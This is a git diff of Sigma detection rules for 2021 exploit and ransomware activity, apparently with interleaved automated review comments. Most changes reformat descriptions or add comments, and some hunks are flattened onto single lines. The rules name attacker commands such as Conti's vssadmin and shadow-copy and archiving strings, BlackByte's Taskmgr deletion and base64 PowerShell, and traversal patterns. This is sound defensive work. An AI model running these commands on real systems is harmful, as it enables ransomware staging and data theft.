@@ -23,7 +21,7 @@ detection:
Channel: Security
selection:
EventID: 5145
- ShareName: \\\\\*\\IPC$
+ ShareName: \\\\\*\\IPC$ # looking for the string \\*\IPC$
RelativeTargetName: spoolss
AccessMask: '0x3'
ObjectType: File
diff --git a/sigma/builtin/emerging-threats/2021/Exploits/CVE-2021-26084/proc_creation_win_exploit_cve_2021_26084_atlassian_confluence.yml b/sigma/builtin/emerging-threats/2021/Exploits/CVE-2021-26084/proc_creation_win_exploit_cve_2021_26084_atlassian_confluence.yml
index 19f4dccc9..cfa8f9d99 100644
--- a/sigma/builtin/emerging-threats/2021/Exploits/CVE-2021-26084/proc_creation_win_exploit_cve_2021_26084_atlassian_confluence.yml
+++ b/sigma/builtin/emerging-threats/2021/Exploits/CVE-2021-26084/proc_creation_win_exploit_cve_2021_26084_atlassian_confluence.yml
@@ -1,8 +1,7 @@
title: Potential Atlassian Confluence CVE-2021-26084 Exploitation Attempt
id: 245f92e3-c4da-45f1-9070-bc552e06db11
status: test
-description: Detects spawning of suspicious child processes by Atlassian Confluence
- server which may indicate successful exploitation of CVE-2021-26084
+description: Detects spawning of suspicious child processes by Atlassian Confluence server which may indicate successful exploitation of CVE-2021-26084
references:
- https://nvd.nist.gov/vuln/detail/CVE-2021-26084
- https://confluence.atlassian.com/doc/confluence-security-advisory-2021-08-25-1077906215.html
@@ -25,7 +24,8 @@ detection:
EventID: 4688
Channel: Security
selection:
- CommandLine|contains:
+ # Monitor suspicious child processes spawned by Confluence
+ CommandLine|contains:
- certutil
- cmd /c
- cmd /k
diff --git a/sigma/builtin/emerging-threats/2021/Exploits/CVE-2021-26857/proc_creation_win_exploit_cve_2021_26857_msexchange.yml b/sigma/builtin/emerging-threats/2021/Exploits/CVE-2021-26857/proc_creation_win_exploit_cve_2021_26857_msexchange.yml
index e959ace15..e94eb7e3c 100644
--- a/sigma/builtin/emerging-threats/2021/Exploits/CVE-2021-26857/proc_creation_win_exploit_cve_2021_26857_msexchange.yml
+++ b/sigma/builtin/emerging-threats/2021/Exploits/CVE-2021-26857/proc_creation_win_exploit_cve_2021_26857_msexchange.yml
@@ -1,9 +1,7 @@
title: Potential CVE-2021-26857 Exploitation Attempt
id: cd479ccc-d8f0-4c66-ba7d-e06286f3f887
status: stable
-description: Detects possible successful exploitation for vulnerability described
- in CVE-2021-26857 by looking for | abnormal subprocesses spawning by Exchange
- Server's Unified Messaging service
+description: Detects possible successful exploitation for vulnerability described in CVE-2021-26857 by looking for | abnormal subprocesses spawning by Exchange Server's Unified Messaging service
references:
- https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/
author: Bhabesh Raj
@@ -24,7 +22,7 @@ detection:
selection:
ParentProcessName|endswith: \UMWorkerProcess.exe
filter:
- NewProcessName|endswith:
+ NewProcessName|endswith:
- wermgr.exe
- WerFault.exe
condition: process_creation and (selection and not filter)
diff --git a/sigma/builtin/emerging-threats/2021/Exploits/CVE-2021-35211/proc_creation_win_exploit_cve_2021_35211_servu.yml b/sigma/builtin/emerging-threats/2021/Exploits/CVE-2021-35211/proc_creation_win_exploit_cve_2021_35211_servu.yml
index 8026ba59c..f00a0f98b 100644
--- a/sigma/builtin/emerging-threats/2021/Exploits/CVE-2021-35211/proc_creation_win_exploit_cve_2021_35211_servu.yml
+++ b/sigma/builtin/emerging-threats/2021/Exploits/CVE-2021-35211/proc_creation_win_exploit_cve_2021_35211_servu.yml
@@ -1,8 +1,7 @@
title: Serv-U Exploitation CVE-2021-35211 by DEV-0322
id: 75578840-9526-4b2a-9462-af469a45e767
status: test
-description: Detects patterns as noticed in exploitation of Serv-U CVE-2021-35211
- vulnerability by threat group DEV-0322
+description: Detects patterns as noticed in exploitation of Serv-U CVE-2021-35211 vulnerability by threat group DEV-0322
references:
- https://www.microsoft.com/security/blog/2021/07/13/microsoft-discovers-threat-actor-targeting-solarwinds-serv-u-software-with-0-day-exploit/
author: Florian Roth (Nextron Systems)
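Review bot: The `filter` exclusion in the CVE-2021-26857 rule uses `NewProcessName|endswith:` with bare `wermgr.exe` / `WerFault.exe` (no leading backslash), so any child of UMWorkerProcess.exe whose image name merely ends in those strings — say a webshell-dropped `xWerFault.exe` — is silently excluded from what is otherwise a catch-all on the parent. Anchoring on the path separator closes that gap with two edits: `- \wermgr.exe` and `- \WerFault.exe`, which also matches how the rule's own `ParentProcessName|endswith: \UMWorkerProcess.exe` is written. The `process_creation` selector named in the condition is defined above this hunk.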
@@ -13,6 +12,7 @@ tags:
- attack.t1136.001
- cve.2021.35211
- detection.emerging_threats
+ # - threat_group.DEV-0322
logsource:
category: process_creation
product: windows
@@ -21,13 +21,13 @@ detection:
EventID: 4688
Channel: Security
selection_whoami:
- CommandLine|contains: whoami
+ CommandLine|contains: whoami
selection_cmd_1:
- CommandLine|contains:
+ CommandLine|contains:
- ./Client/Common/
- .\Client\Common\
selection_cmd_2:
- CommandLine|contains: C:\Windows\Temp\Serv-U.bat
+ CommandLine|contains: C:\Windows\Temp\Serv-U.bat
condition: process_creation and (selection_whoami and 1 of selection_cmd*)
falsepositives:
- Unlikely
diff --git a/sigma/builtin/emerging-threats/2021/Exploits/CVE-2021-40444/proc_creation_win_exploit_cve_2021_40444.yml b/sigma/builtin/emerging-threats/2021/Exploits/CVE-2021-40444/proc_creation_win_exploit_cve_2021_40444.yml
index b7ee438cc..9e22c47ec 100644
--- a/sigma/builtin/emerging-threats/2021/Exploits/CVE-2021-40444/proc_creation_win_exploit_cve_2021_40444.yml
+++ b/sigma/builtin/emerging-threats/2021/Exploits/CVE-2021-40444/proc_creation_win_exploit_cve_2021_40444.yml
@@ -1,8 +1,7 @@
title: Potential CVE-2021-40444 Exploitation Attempt
id: 894397c6-da03-425c-a589-3d09e7d1f750
status: test
-description: Detects potential exploitation of CVE-2021-40444 via suspicious process
- patterns seen in in-the-wild exploitations
+description: Detects potential exploitation of CVE-2021-40444 via suspicious process patterns seen in in-the-wild exploitations
references:
- https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-40444
- https://twitter.com/neonprimetime/status/1435584010202255375
@@ -23,13 +22,13 @@ detection:
EventID: 4688
Channel: Security
selection:
- NewProcessName|endswith: \control.exe
+ NewProcessName|endswith: \control.exe
ParentProcessName|endswith:
- \winword.exe
- \powerpnt.exe
- \excel.exe
filter:
- CommandLine|endswith:
+ CommandLine|endswith:
- \control.exe input.dll
- \control.exe" input.dll
condition: process_creation and (selection and not filter)
diff --git a/sigma/builtin/emerging-threats/2021/Exploits/CVE-2021-40444/proc_creation_win_exploit_cve_2021_40444_office_directory_traversal.yml b/sigma/builtin/emerging-threats/2021/Exploits/CVE-2021-40444/proc_creation_win_exploit_cve_2021_40444_office_directory_traversal.yml
index 59ce31cdd..76b60849e 100644
--- a/sigma/builtin/emerging-threats/2021/Exploits/CVE-2021-40444/proc_creation_win_exploit_cve_2021_40444_office_directory_traversal.yml
+++ b/sigma/builtin/emerging-threats/2021/Exploits/CVE-2021-40444/proc_creation_win_exploit_cve_2021_40444_office_directory_traversal.yml
@@ -1,9 +1,7 @@
title: Potential Exploitation Attempt From Office Application
id: 868955d9-697e-45d4-a3da-360cefd7c216
status: test
-description: Detects Office applications executing a child process that includes directory
- traversal patterns. This could be an attempt to exploit CVE-2022-30190 (MSDT RCE)
- or CVE-2021-40444 (MSHTML RCE)
+description: Detects Office applications executing a child process that includes directory traversal patterns. This could be an attempt to exploit CVE-2022-30190 (MSDT RCE) or CVE-2021-40444 (MSHTML RCE)
references:
- https://twitter.com/sbousseaden/status/1531653369546301440
- https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-40444
@@ -24,7 +22,7 @@ detection:
EventID: 4688
Channel: Security
selection:
- CommandLine|contains:
+ CommandLine|contains:
- ../../../..
- ..\..\..\..
- ..//..//..//..
diff --git a/sigma/builtin/emerging-threats/2021/Exploits/CVE-2021-41379/proc_creation_win_exploit_cve_2021_41379.yml b/sigma/builtin/emerging-threats/2021/Exploits/CVE-2021-41379/proc_creation_win_exploit_cve_2021_41379.yml
index 3a6a62820..27d810c6e 100644
--- a/sigma/builtin/emerging-threats/2021/Exploits/CVE-2021-41379/proc_creation_win_exploit_cve_2021_41379.yml
+++ b/sigma/builtin/emerging-threats/2021/Exploits/CVE-2021-41379/proc_creation_win_exploit_cve_2021_41379.yml
@@ -1,10 +1,7 @@
title: Potential CVE-2021-41379 Exploitation Attempt
id: af8bbce4-f751-46b4-8d91-82a33a736f61
status: test
-description: Detects potential exploitation attempts of CVE-2021-41379 (InstallerFileTakeOver),
- a local privilege escalation (LPE) vulnerability where the attacker spawns a "cmd.exe"
- process as a child of Microsoft Edge elevation service "elevation_service" with
- "LOCAL_SYSTEM" rights
+description: Detects potential exploitation attempts of CVE-2021-41379 (InstallerFileTakeOver), a local privilege escalation (LPE) vulnerability where the attacker spawns a "cmd.exe" process as a child of Microsoft Edge elevation service "elevation_service" with "LOCAL_SYSTEM" rights
references:
- https://web.archive.org/web/20220421061949/https://github.com/klinix5/InstallerFileTakeOver
- https://www.bleepingcomputer.com/news/microsoft/new-windows-zero-day-with-public-exploit-lets-you-become-an-admin/
@@ -26,14 +23,14 @@ detection:
EventID: 4688
Channel: Security
selection_img:
- - NewProcessName|endswith:
- - \cmd.exe
- - \powershell.exe
- - \pwsh.exe
- - OriginalFileName:
- - Cmd.Exe
- - PowerShell.EXE
- - pwsh.dll
+ - NewProcessName|endswith:
+ - \cmd.exe
+ - \powershell.exe
+ - \pwsh.exe
+ - OriginalFileName:
+ - Cmd.Exe
+ - PowerShell.EXE
+ - pwsh.dll
selection_parent:
ParentProcessName|endswith: \elevation_service.exe
MandatoryLabel: S-1-16-16384
diff --git a/sigma/builtin/emerging-threats/2021/Exploits/CVE-2021-41379/win_vul_cve_2021_41379.yml b/sigma/builtin/emerging-threats/2021/Exploits/CVE-2021-41379/win_vul_cve_2021_41379.yml
index 5639a7ab9..a1c4090e3 100644
--- a/sigma/builtin/emerging-threats/2021/Exploits/CVE-2021-41379/win_vul_cve_2021_41379.yml
+++ b/sigma/builtin/emerging-threats/2021/Exploits/CVE-2021-41379/win_vul_cve_2021_41379.yml
@@ -14,6 +14,7 @@ tags:
logsource:
product: windows
service: application
+ # warning: The 'data' field used in the detection section is the container for the event data as a whole. You may have to adapt the rule for your backend accordingly
detection:
application:
Channel: Application
diff --git a/sigma/builtin/emerging-threats/2021/Exploits/CVE-2021-42278/win_system_exploit_cve_2021_42278.yml b/sigma/builtin/emerging-threats/2021/Exploits/CVE-2021-42278/win_system_exploit_cve_2021_42278.yml
index 49de98d57..dad2d257f 100644
--- a/sigma/builtin/emerging-threats/2021/Exploits/CVE-2021-42278/win_system_exploit_cve_2021_42278.yml
+++ b/sigma/builtin/emerging-threats/2021/Exploits/CVE-2021-42278/win_system_exploit_cve_2021_42278.yml
@@ -1,18 +1,13 @@
title: Potential CVE-2021-42278 Exploitation Attempt
id: 44bbff3e-4ca3-452d-a49a-6efa4cafa06f
related:
- - id: e80a0fee-1a62-4419-b31e-0d0db6e6013a
- type: similar
+ - id: e80a0fee-1a62-4419-b31e-0d0db6e6013a
+ type: similar
status: test
-description: 'The attacker creates a computer object using those permissions with
- a password known to her.
-
+description: |
+ The attacker creates a computer object using those permissions with a password known to her.
After that she clears the attribute ServicePrincipalName on the computer object.
-
- Because she created the object (CREATOR OWNER), she gets granted additional permissions
- and can do many changes to the object.
-
- '
+ Because she created the object (CREATOR OWNER), she gets granted additional permissions and can do many changes to the object.
references:
- https://cloudbrothers.info/en/exploit-kerberos-samaccountname-spoofing/
author: frack113
@@ -30,12 +25,12 @@ detection:
system:
Channel: System
selection:
- Provider_Name: Microsoft-Windows-Kerberos-Key-Distribution-Center
+ Provider_Name: Microsoft-Windows-Kerberos-Key-Distribution-Center # Active Directory
EventID:
- - 35
- - 36
- - 37
- - 38
+ - 35 # PAC without attributes
+ - 36 # Ticket without a PAC
+ - 37 # Ticket without Requestor
+ - 38 # Requestor Mismatch
condition: system and selection
falsepositives:
- Unknown
diff --git a/sigma/builtin/emerging-threats/2021/Exploits/CVE-2021-42287/win_security_samaccountname_spoofing_cve_2021_42287.yml b/sigma/builtin/emerging-threats/2021/Exploits/CVE-2021-42287/win_security_samaccountname_spoofing_cve_2021_42287.yml
index 90c28bc83..f8b3669b4 100644
--- a/sigma/builtin/emerging-threats/2021/Exploits/CVE-2021-42287/win_security_samaccountname_spoofing_cve_2021_42287.yml
+++ b/sigma/builtin/emerging-threats/2021/Exploits/CVE-2021-42287/win_security_samaccountname_spoofing_cve_2021_42287.yml
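Review bot: The new `# Active Directory` comment on `Provider_Name` tells a deployer nothing actionable; what matters is that KDC events 35–38 are only emitted by domain controllers carrying the November 2021 PAC hardening update (KB5008380, to my recollection), so an absence of hits can mean an unpatched DC rather than no attack. I would replace that comment with `# only logged by DCs with the Nov 2021 PAC hardening update (KB5008380); no events may just mean an unpatched DC` and keep the per-ID comments, which are useful. In the description hunk above, `those permissions` is left without an antecedent after the reflow — it presumably means the default right to add computer objects (ms-DS-MachineAccountQuota), which the sentence should name explicitly.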
@@ -1,8 +1,7 @@
title: Suspicious Computer Account Name Change CVE-2021-42287
id: 45eb2ae2-9aa2-4c3a-99a5-6e5077655466
status: test
-description: Detects the renaming of an existing computer account to a account name
- that doesn't contain a $ symbol as seen in attacks against CVE-2021-42287
+description: Detects the renaming of an existing computer account to a account name that doesn't contain a $ symbol as seen in attacks against CVE-2021-42287
references:
- https://medium.com/@mvelazco/hunting-for-samaccountname-spoofing-cve-2021-42287-and-domain-controller-impersonation-f704513c8a45
author: Florian Roth (Nextron Systems)
@@ -22,7 +21,7 @@ detection:
security:
Channel: Security
selection:
- EventID: 4781
+ EventID: 4781 # rename user
OldTargetUserName|contains: $
filter:
NewTargetUserName|contains: $
diff --git a/sigma/builtin/emerging-threats/2021/Exploits/RazerInstaller-LPE-Exploit/proc_creation_win_exploit_other_razorinstaller_lpe.yml b/sigma/builtin/emerging-threats/2021/Exploits/RazerInstaller-LPE-Exploit/proc_creation_win_exploit_other_razorinstaller_lpe.yml
index 3bb91f370..da9ea7a6f 100644
--- a/sigma/builtin/emerging-threats/2021/Exploits/RazerInstaller-LPE-Exploit/proc_creation_win_exploit_other_razorinstaller_lpe.yml
+++ b/sigma/builtin/emerging-threats/2021/Exploits/RazerInstaller-LPE-Exploit/proc_creation_win_exploit_other_razorinstaller_lpe.yml
@@ -1,9 +1,7 @@ title: Suspicious RazerInstaller Explorer Subprocess id: a4eaf250-7dc1-4842-862a-5e71cd59a167 status: test -description: Detects a explorer.exe sub process of the RazerInstaller software which - can be invoked from the installer to select a different installation folder but - can also be exploited to escalate privileges to LOCAL SYSTEM +description: Detects a explorer.exe sub process of the RazerInstaller software which can be invoked from the installer to select a different installation folder but can also be exploited to escalate privileges to LOCAL SYSTEM references: - https://twitter.com/j0nh4t/status/1429049506021138437 - https://streamable.com/q2dsji @@ -25,10 +23,9 @@ detection: ParentProcessName|endswith: \RazerInstaller.exe MandatoryLabel: S-1-16-16384 filter: - NewProcessName|startswith: C:\Windows\Installer\Razer\Installer\ + NewProcessName|startswith: C:\Windows\Installer\Razer\Installer\ condition: process_creation and (selection and not filter) falsepositives: - - User selecting a different installation folder (check for other sub processes - of this explorer.exe process) + - User selecting a different installation folder (check for other sub processes of this explorer.exe process) level: high ruletype: Sigma diff --git a/sigma/builtin/emerging-threats/2021/Exploits/SystemNightmare-Exploit/proc_creation_win_exploit_other_systemnightmare.yml b/sigma/builtin/emerging-threats/2021/Exploits/SystemNightmare-Exploit/proc_creation_win_exploit_other_systemnightmare.yml index 9dc52b1cc..e0c9bd606 100644 --- a/sigma/builtin/emerging-threats/2021/Exploits/SystemNightmare-Exploit/proc_creation_win_exploit_other_systemnightmare.yml +++ b/sigma/builtin/emerging-threats/2021/Exploits/SystemNightmare-Exploit/proc_creation_win_exploit_other_systemnightmare.yml 
@@ -1,8 +1,7 @@ title: Potential SystemNightmare Exploitation Attempt id: c01f7bd6-0c1d-47aa-9c61-187b91273a16 status: test -description: Detects an exploitation attempt of SystemNightmare in order to obtain - a shell as LOCAL_SYSTEM +description: Detects an exploitation attempt of SystemNightmare in order to obtain a shell as LOCAL_SYSTEM references: - https://github.com/GossiTheDog/SystemNightmare author: Florian Roth (Nextron Systems) @@ -20,7 +19,7 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains: + CommandLine|contains: - printnightmare.gentilkiwi.com - ' /user:gentilguest ' - Kiwi Legit Printer diff --git a/sigma/builtin/emerging-threats/2021/Exploits/registry_set_cve_2021_31979_cve_2021_33771_exploits.yml b/sigma/builtin/emerging-threats/2021/Exploits/registry_set_cve_2021_31979_cve_2021_33771_exploits.yml index c3c138c58..2fbf20afa 100644 --- a/sigma/builtin/emerging-threats/2021/Exploits/registry_set_cve_2021_31979_cve_2021_33771_exploits.yml +++ b/sigma/builtin/emerging-threats/2021/Exploits/registry_set_cve_2021_31979_cve_2021_33771_exploits.yml @@ -1,8 +1,7 @@ title: CVE-2021-31979 CVE-2021-33771 Exploits id: 32b5db62-cb5f-4266-9639-0fa48376ac00 status: experimental -description: Detects patterns as noticed in exploitation of Windows CVE-2021-31979 - CVE-2021-33771 vulnerability and DevilsTongue malware by threat group Sourgum +description: Detects patterns as noticed in exploitation of Windows CVE-2021-31979 CVE-2021-33771 vulnerability and DevilsTongue malware by threat group Sourgum references: - https://www.microsoft.com/security/blog/2021/07/15/protecting-customers-from-a-private-sector-offensive-actor-using-0-day-exploits-and-devilstongue-malware/ - https://citizenlab.ca/2021/07/hooking-candiru-another-mercenary-spyware-vendor-comes-into-focus/ @@ -16,6 +15,7 @@ tags: - cve.2021.33771 - cve.2021.31979 - detection.emerging_threats + # - threat_group.Sourgum logsource: product: windows category: registry_set 
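Review bot: The added `# - threat_group.Sourgum` under `tags` in the registry_set CVE-2021-31979/CVE-2021-33771 hunk is a commented-out tag, which is dead metadata: nothing that consumes the tags list sees it, and the description already names the group. Whether a `threat_group.*` tag is accepted by the tag conventions is not visible here; if it is, make it a live entry, and if it is not, the comment will only go stale and should be dropped. The hunk ends at `category: registry_set`, so the detection block it belongs to is outside this view.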
diff --git a/sigma/builtin/emerging-threats/2021/Exploits/win_exchange_cve_2021_42321.yml b/sigma/builtin/emerging-threats/2021/Exploits/win_exchange_cve_2021_42321.yml index 3fdaaa0e9..b852c739f 100644 --- a/sigma/builtin/emerging-threats/2021/Exploits/win_exchange_cve_2021_42321.yml +++ b/sigma/builtin/emerging-threats/2021/Exploits/win_exchange_cve_2021_42321.yml @@ -1,8 +1,7 @@ title: Possible Exploitation of Exchange RCE CVE-2021-42321 id: c92f1896-d1d2-43c3-92d5-7a5b35c217bb status: test -description: Detects log entries that appear in exploitation attempts against MS Exchange - RCE CVE-2021-42321 +description: Detects log entries that appear in exploitation attempts against MS Exchange RCE CVE-2021-42321 references: - https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-42321 author: Florian Roth (Nextron Systems), @testanull @@ -15,6 +14,7 @@ tags: logsource: product: windows service: msexchange-management + # warning: The 'data' field used in the detection section is the container for the event data as a whole. You may have to adapt the rule for your backend accordingly detection: msexchange_management: Channel: MSExchange Management diff --git a/sigma/builtin/emerging-threats/2021/Malware/BlackByte/proc_creation_win_malware_blackbyte_ransomware.yml b/sigma/builtin/emerging-threats/2021/Malware/BlackByte/proc_creation_win_malware_blackbyte_ransomware.yml index 15761a669..8e07648bc 100644 --- a/sigma/builtin/emerging-threats/2021/Malware/BlackByte/proc_creation_win_malware_blackbyte_ransomware.yml +++ b/sigma/builtin/emerging-threats/2021/Malware/BlackByte/proc_creation_win_malware_blackbyte_ransomware.yml 
@@ -1,8 +1,7 @@ title: Potential BlackByte Ransomware Activity id: 999e8307-a775-4d5f-addc-4855632335be status: test -description: Detects command line patterns used by BlackByte ransomware in different - operations +description: Detects command line patterns used by BlackByte ransomware in different operations references: - https://redcanary.com/blog/blackbyte-ransomware/ author: Florian Roth (Nextron Systems) @@ -25,10 +24,10 @@ detection: EventID: 4688 Channel: Security selection_1: - CommandLine|contains: ' -single ' - NewProcessName|startswith: C:\Users\Public\ + CommandLine|contains: ' -single ' + NewProcessName|startswith: C:\Users\Public\ selection_2: - CommandLine|contains: + CommandLine|contains: - del C:\Windows\System32\Taskmgr.exe - ;Set-Service -StartupType Disabled $ - powershell -command "$x =[System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String( diff --git a/sigma/builtin/emerging-threats/2021/Malware/Conti/proc_creation_win_malware_conti.yml b/sigma/builtin/emerging-threats/2021/Malware/Conti/proc_creation_win_malware_conti.yml index c7b54a6eb..a1cee1e23 100644 --- a/sigma/builtin/emerging-threats/2021/Malware/Conti/proc_creation_win_malware_conti.yml +++ b/sigma/builtin/emerging-threats/2021/Malware/Conti/proc_creation_win_malware_conti.yml @@ -19,7 +19,7 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains|all: + CommandLine|contains|all: - vssadmin list shadows - log.txt condition: process_creation and selection diff --git a/sigma/builtin/emerging-threats/2021/Malware/Conti/proc_creation_win_malware_conti_7zip.yml b/sigma/builtin/emerging-threats/2021/Malware/Conti/proc_creation_win_malware_conti_7zip.yml index 89e0e2547..96ab7caba 100644 --- a/sigma/builtin/emerging-threats/2021/Malware/Conti/proc_creation_win_malware_conti_7zip.yml +++ b/sigma/builtin/emerging-threats/2021/Malware/Conti/proc_creation_win_malware_conti_7zip.yml 
@@ -20,7 +20,7 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains|all: + CommandLine|contains|all: - 7za.exe - \\C$\\temp\\log.zip condition: process_creation and selection diff --git a/sigma/builtin/emerging-threats/2021/Malware/Conti/proc_creation_win_malware_conti_ransomware_commands.yml b/sigma/builtin/emerging-threats/2021/Malware/Conti/proc_creation_win_malware_conti_ransomware_commands.yml index 87404e214..dbb15619a 100644 --- a/sigma/builtin/emerging-threats/2021/Malware/Conti/proc_creation_win_malware_conti_ransomware_commands.yml +++ b/sigma/builtin/emerging-threats/2021/Malware/Conti/proc_creation_win_malware_conti_ransomware_commands.yml @@ -21,10 +21,10 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains|all: + CommandLine|contains|all: - '-m ' - '-net ' - - '-size ' + - '-size ' # Size 10 in references - '-nomutex ' - -p \\\\ - $ diff --git a/sigma/builtin/emerging-threats/2021/Malware/Conti/proc_creation_win_malware_conti_ransomware_database_dump.yml b/sigma/builtin/emerging-threats/2021/Malware/Conti/proc_creation_win_malware_conti_ransomware_database_dump.yml index 4f950499b..3f3b4fccc 100644 --- a/sigma/builtin/emerging-threats/2021/Malware/Conti/proc_creation_win_malware_conti_ransomware_database_dump.yml +++ b/sigma/builtin/emerging-threats/2021/Malware/Conti/proc_creation_win_malware_conti_ransomware_database_dump.yml @@ -3,7 +3,7 @@ id: 2f47f1fd-0901-466e-a770-3b7092834a1b status: test description: Detects a command used by conti to dump database references: - - https://twitter.com/vxunderground/status/1423336151860002816?s=20 + - https://twitter.com/vxunderground/status/1423336151860002816?s=20 # The leak info not the files itself - https://www.virustotal.com/gui/file/03e9b8c2e86d6db450e5eceec057d7e369ee2389b9daecaf06331a95410aa5f8/detection - https://docs.microsoft.com/en-us/sql/tools/sqlcmd-utility?view=sql-server-ver15 author: frack113 
@@ -21,14 +21,14 @@ detection: EventID: 4688 Channel: Security selection_tools: - - NewProcessName|endswith: \sqlcmd.exe - - CommandLine|contains: - - 'sqlcmd ' - - sqlcmd.exe + - NewProcessName|endswith: \sqlcmd.exe + - CommandLine|contains: + - 'sqlcmd ' + - sqlcmd.exe selection_svr: - CommandLine|contains: ' -S localhost ' + CommandLine|contains: ' -S localhost ' selection_query: - CommandLine|contains: + CommandLine|contains: - sys.sysprocesses - master.dbo.sysdatabases - BACKUP DATABASE diff --git a/sigma/builtin/emerging-threats/2021/Malware/DarkSide/proc_creation_win_malware_darkside_ransomware.yml b/sigma/builtin/emerging-threats/2021/Malware/DarkSide/proc_creation_win_malware_darkside_ransomware.yml index 88a9b57cb..ca667dbe3 100644 --- a/sigma/builtin/emerging-threats/2021/Malware/DarkSide/proc_creation_win_malware_darkside_ransomware.yml +++ b/sigma/builtin/emerging-threats/2021/Malware/DarkSide/proc_creation_win_malware_darkside_ransomware.yml @@ -20,12 +20,12 @@ detection: EventID: 4688 Channel: Security selection1: - CommandLine|contains: + CommandLine|contains: - =[char][byte]('0x'+ - ' -work worker0 -path ' selection2: ParentCommandLine|contains: DllHost.exe /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7} - NewProcessName|contains: \AppData\Local\Temp\ + NewProcessName|contains: \AppData\Local\Temp\ condition: process_creation and (1 of selection*) falsepositives: - Unknown diff --git a/sigma/builtin/emerging-threats/2021/Malware/Devil-Bait/proc_creation_win_malware_devil_bait_output_redirect.yml b/sigma/builtin/emerging-threats/2021/Malware/Devil-Bait/proc_creation_win_malware_devil_bait_output_redirect.yml index 0e83fc9b9..0b71d9f68 100644 --- a/sigma/builtin/emerging-threats/2021/Malware/Devil-Bait/proc_creation_win_malware_devil_bait_output_redirect.yml +++ b/sigma/builtin/emerging-threats/2021/Malware/Devil-Bait/proc_creation_win_malware_devil_bait_output_redirect.yml 
@@ -1,8 +1,8 @@ title: Potential Devil Bait Malware Reconnaissance id: e8954be4-b2b8-4961-be18-da1a5bda709c related: - - id: 8e0bb260-d4b2-4fff-bb8d-3f82118e6892 - type: derived + - id: 8e0bb260-d4b2-4fff-bb8d-3f82118e6892 + type: derived status: experimental description: Detects specific process behavior observed with Devil Bait samples references: @@ -22,14 +22,16 @@ detection: EventID: 4688 Channel: Security selection_redirect: - CommandLine|contains: '>>%APPDATA%\Microsoft\' - CommandLine|endswith: + CommandLine|contains: '>>%APPDATA%\Microsoft\' + CommandLine|endswith: - .xml - .txt ParentProcessName|endswith: \wscript.exe - NewProcessName|endswith: \cmd.exe + NewProcessName|endswith: \cmd.exe selection_recon_cmd: - CommandLine|contains: + CommandLine|contains: + # Taken from a6f9043627f8be2452153b5dbf6278e9b91763c3b5c2aea537a859e0c8c6b504 + # If you find samples using other commands please add them - dir - ipconfig /all - systeminfo diff --git a/sigma/builtin/emerging-threats/2021/Malware/Goofy-Guineapig/proc_creation_win_malware_goofy_guineapig_broken_cmd.yml b/sigma/builtin/emerging-threats/2021/Malware/Goofy-Guineapig/proc_creation_win_malware_goofy_guineapig_broken_cmd.yml index afa74e96f..b6dea421d 100644 --- a/sigma/builtin/emerging-threats/2021/Malware/Goofy-Guineapig/proc_creation_win_malware_goofy_guineapig_broken_cmd.yml +++ b/sigma/builtin/emerging-threats/2021/Malware/Goofy-Guineapig/proc_creation_win_malware_goofy_guineapig_broken_cmd.yml 
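Review bot: The comment `# Taken from a6f9043627f8be2452153b5dbf6278e9b91763c3b5c2aea537a859e0c8c6b504` above the `selection_recon_cmd` values gives a bare 64-hex value with no label; it is presumably a sample hash (SHA-256 length), but a reader has to guess. Prefixing it, e.g. `# Commands taken from sample SHA256 a6f90436…b504`, makes the provenance of the `dir`/`ipconfig /all`/`systeminfo` list unambiguous. The `condition` that ties `selection_recon_cmd` to `selection_redirect` is outside the hunk, so I cannot confirm how broad substrings such as `dir` are constrained.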
@@ -1,8 +1,7 @@ title: Potential Goofy Guineapig Backdoor Activity id: 477a5ed3-a374-4282-9f3b-ed94e159a108 status: experimental -description: Detects a specific broken command that was used by Goofy-Guineapig as - described by the NCSC report. +description: Detects a specific broken command that was used by Goofy-Guineapig as described by the NCSC report. references: - https://www.ncsc.gov.uk/static-assets/documents/malware-analysis-reports/goofy-guineapig/NCSC-MAR-Goofy-Guineapig.pdf author: X__Junior (Nextron Systems) @@ -18,7 +17,7 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains: choice /t %d /d y /n >nul + CommandLine|contains: choice /t %d /d y /n >nul condition: process_creation and selection falsepositives: - Unlikely diff --git a/sigma/builtin/emerging-threats/2021/Malware/Goofy-Guineapig/proc_creation_win_malware_goofy_guineapig_googleupdate_uncommon_child_instance.yml b/sigma/builtin/emerging-threats/2021/Malware/Goofy-Guineapig/proc_creation_win_malware_goofy_guineapig_googleupdate_uncommon_child_instance.yml index 51434e54b..df83e5aee 100644 --- a/sigma/builtin/emerging-threats/2021/Malware/Goofy-Guineapig/proc_creation_win_malware_goofy_guineapig_googleupdate_uncommon_child_instance.yml +++ b/sigma/builtin/emerging-threats/2021/Malware/Goofy-Guineapig/proc_creation_win_malware_goofy_guineapig_googleupdate_uncommon_child_instance.yml 
@@ -1,8 +1,7 @@ title: Potential Goofy Guineapig GoolgeUpdate Process Anomaly id: bdbab15a-3826-48fa-a1b7-723cd8f32fcc status: experimental -description: Detects "GoogleUpdate.exe" spawning a new instance of itself in an uncommon - location as seen used by the Goofy Guineapig backdoor +description: Detects "GoogleUpdate.exe" spawning a new instance of itself in an uncommon location as seen used by the Goofy Guineapig backdoor references: - https://www.ncsc.gov.uk/static-assets/documents/malware-analysis-reports/goofy-guineapig/NCSC-MAR-Goofy-Guineapig.pdf author: X__Junior (Nextron Systems), Nasreddine Bencherchali (Nextron Systems) @@ -19,12 +18,12 @@ detection: Channel: Security selection: ParentProcessName|endswith: \GoogleUpdate.exe - NewProcessName|endswith: \GoogleUpdate.exe + NewProcessName|endswith: \GoogleUpdate.exe filter_main_legit_paths: - - NewProcessName|startswith: - - C:\Program Files\Google\ - - C:\Program Files (x86)\Google\ - - NewProcessName|contains: \AppData\Local\Google\Update\ + - NewProcessName|startswith: + - C:\Program Files\Google\ + - C:\Program Files (x86)\Google\ + - NewProcessName|contains: \AppData\Local\Google\Update\ condition: process_creation and (selection and not 1 of filter_main_*) falsepositives: - Unknown diff --git 